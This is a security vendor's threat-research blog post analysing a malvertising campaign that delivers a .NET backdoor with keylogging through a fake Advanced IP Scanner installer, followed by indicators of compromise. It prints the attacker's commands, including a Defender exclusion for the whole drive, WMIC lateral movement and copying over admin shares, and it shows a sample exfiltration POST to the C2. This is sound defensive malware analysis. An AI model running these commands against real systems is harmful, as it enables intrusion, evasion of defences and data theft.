Blog

WorkersDevBackdoor Delivered via Malvertising

BY eSentire Threat Response Unit (TRU)

January 8, 2024 | 8 MINS READ

Attacks/Breaches

Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin

Want to learn more on how to achieve Cyber Resilience?

TALK TO AN EXPERT

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

Latest Update: January 12th, 2023 - The backdoor reported by @G60930953 is identified as ThunderShell, an open-source RAT available on GitHub. ConnectWise, naming it Parcel RAT, and Mandiant, calling it SMOKEDHAM, have also reported on this malware.
Top of Form

What did we find?

In November 2023, eSentire’s Threat Response Unit (TRU) detected WorkersDevBackdoor malware impacting a customer in business services industry. This malware spreads through malicious online ads, tricking users into downloading it by mimicking legitimate software. Once installed, it secretly collects sensitive information and provides backdoor access to the infected system. The full infection chain with the suspicious PowerShell command is shown in Figure 1.

Figure 1: infection chain

The initial infection vector was a drive-by download via a Google Search advertisement. The service can be used to distribute malware to targets within an ideal group, such as network administrators without knowledge of their email address (something that would be required for malware delivered via email). Compounding this problem is the inherent trust that the platform is filtering malicious content, and email-oriented security awareness programs.

In this case, the user had searched for the Advanced IP Scanner application and downloaded the malicious installer from an imposter website at advanced-ip-scanners[.]net. The malicious installer was created using NSIS (Nullsoft Scriptable Install System), an open-source system used to create Windows installers. Upon unpacking the installer, we see the ZIP archive named WindowsDev.7z.

Figure 2: The contents of Advanced IP Installer

NSIS-generated installers come with NSIS.ini script that automates the installation process. We can view the INI file with 7z but the latest versions of 7z cannot see the INI file, we will use the older version instead (7z 9.38).

The [NSIS].ini script performs the actions listed in Figure 3.

Figure 3: Contents of NSIS.ini script
Figure 4: Arguments for the shortcut file
Figure 5: Metadata left by the malware developer

The batch file NodejsToolsVsix.bat contains the code to set the PowerShell Path. It sets a variable LinkRunPS to the default PowerShell path. This is used to ensure the script uses the correct version of PowerShell. The IF statement checks the system architecture and adjusts the PowerShell path if the system is 64-bit. Then it executes the batch script via InvokeScript (Figure 6).

Figure 6: Execution of the PowerShell script via batch file

Let’s briefly look at the PowerShell script. The command “$UMGHyr0wTZa2 = convertto-securestring -String $k2FJj7u5G1vW -Key ($5ob67dVlTngs)” is creating a secure string using the convertto-securestring cmdlet. It decrypts the data (2) under $k2FJj7u5G1vW with the key (1) under $5ob67dVlTngs variable. The last line (3) calls a static method HMEqRPzgHocKlu on a class RZjKVf.ovbEFleTI, which is defined in the injected code. The method takes three parameters, including a URL and two other strings (Figure 7).

Figure 7: PowerShell script (CG6oDkyFHl3R.t)

The encrypted data is the .NET payload that gets loaded in memory upon the execution of the PowerShell script.

In Figure 8 we see the function responsible for creating a seed for the random number generator. The seed is a bitwise XOR of the current process's ID and the number of seconds since January 1, 1970 (Unix epoch time). This approach makes the random seed more unique and less predictable. The conditional statement “if (fzBoRxFO == 0) { fzBoRxFO = random.Next(1, 16)” determines the length of the generated string.

If the fzBoRxFO parameter is 0, the length is set to a random value between 1 and 15. The “for” loop iterates 15 times, each time appending a randomly selected character from the text string to a StringBuilder object. The generated string is then used as a part of the URL path to send POST requests of the victim’s data to C2. The function is also used to generate a unique ID for the infected machine to communicate with C2.

Figure 8: String generator

You can see the example of randomly generated strings in traffic capture in Figure 9.

Figure 9: Traffic capture

The function in Figure 10 creates as formatted string consisting of the string “register”, unique ID created. The method ZyKZ() is creating a string that combines the computer name, user domain, and username into a single string and appending it to the formatted string to send out to the C2 upon initial infection (registering the infected host).

Figure 10: Function responsible for formatting the string to register the infected device

The formatted string is then encrypted with RC4 with the hardcoded key in the PowerShell script, gets base64-encoded, and is sent out to C2 in the following JSON format:

The script sleeps for 1000 milliseconds and awaits the response/further commands from C2. The commands from C2 are also RC4-encrypted with the same key and base64-encoded. The first automated command from C2 is “whoami”.

Further on, the script sleeps for the amount of time assigned in the PowerShell script (in our case it’s 75000 milliseconds) each time after it receives the response from the C2. After approximately 6-10 minutes after the malicious payload execution have observed the threat actors running the following commands on the infected host:

<ul><li>net user</li><li>nslookup -type=srv_ldap._tcp.<redacted></redacted></li><li>systeminfo</li><li>whoami</li><li>"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"   Add-MpPreference -ExclusionPath C:\</li><li>"C:\Windows\System32\Wbem\WMIC.exe" /node:<redacted> process call create "cmd.exe /c c:\programdata\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk" (the threat actor attempted to move laterally to another host via WMIC)</redacted></li><li>"C:\Windows\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\<redacted>\C$\programdata\Microsoft\LogConverter /E /H /Y (the threat   actor attempted to copy the malicious file to another host)</redacted></li></ul>

We have named the .NET backdoor “WorkDevBackdoor”. The backdoor also has keylogger functionality and retrieves the title of the currently active window (Figure 11). The captured input is then base64-encoded and appended with the GUID parameter of the infected host along with the string “userinput”.

Figure 11: Keylogger functionality

Here is the example of the POST request sent to C2:

POST hxxps://cdn-us-tech.wtf-system-4758995.workers[.]dev/MsB0h/ HTTP/1.1
User-Agent: Microsoft Windows NT 10.0.16299.0
Content-Type: application/json
Host: cdn-us-tech.wtf-system-4758995.workers[.]dev
Content-Length: 131
Expect: 100-continue
Connection: Keep-Alive
{"UUID":<REDACTED>,"ID":"sMsB0hNEMIglZ8J8","Data":<base64-encoded string”>}

We did some research and found a similar chain of infection described by @0xBurgers (Figure 12).

Figure 12: Twitter post of the similar threat by @0xBurgers

You can access the Yara rules for WorkDevBackdoor here.

What did we do?

Our machine-learning powered PowerShell classifier, BlueSteel, detected the execution of the suspicious PowerShell command.

Our team of 24/7 SOC Cyber Analysts isolated the affected host, contained the threat and notified the customer of suspicious activities.

What can you learn from this TRU positive?

Recommendations from our Threat Response Unit (TRU):

Protecting against malware requires a multi-layered defense approach to defend endpoints from malware and detect or block unauthorized login activity against applications and remote access services. Therefore, we recommend:

Indicators Of Compromise

Name

Indicators

Advanced_IP_Scanner_2.5.4594.1

521210e39b5b8364d34e62cb3cb9e9cd

LogConverter

a607e92aa155168de57e39d3b0d1b7e0

Microsoft.NodejsTools.PressAnyKey.exe

1b1ec901b4f4374d361d4839d0e53523

Microsoft.NodejsTools.PressAnyKey.lnk

f6f4b821716053e03c911417ef1c2c99

CG6oDkyFHl3R.t

646ed75ae910483b8ee009b23d83d4e0

q8DTE1uLaXRG.t

6180c6c92c0eba74f9871863d308c8cb

WorkDevBackdoor

d606255c411445b210ecd437faa6b43e

WorkDevBackdoor C2

cdn-us-tech.wtf-system-4759011.workers[.]dev

WorkDevBackdoor C2

cdn-us-tech.wtf-system-4758995[.]workers.dev

Reference

eSentire Unit
eSentire Threat Response Unit (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.

Read the Latest from eSentire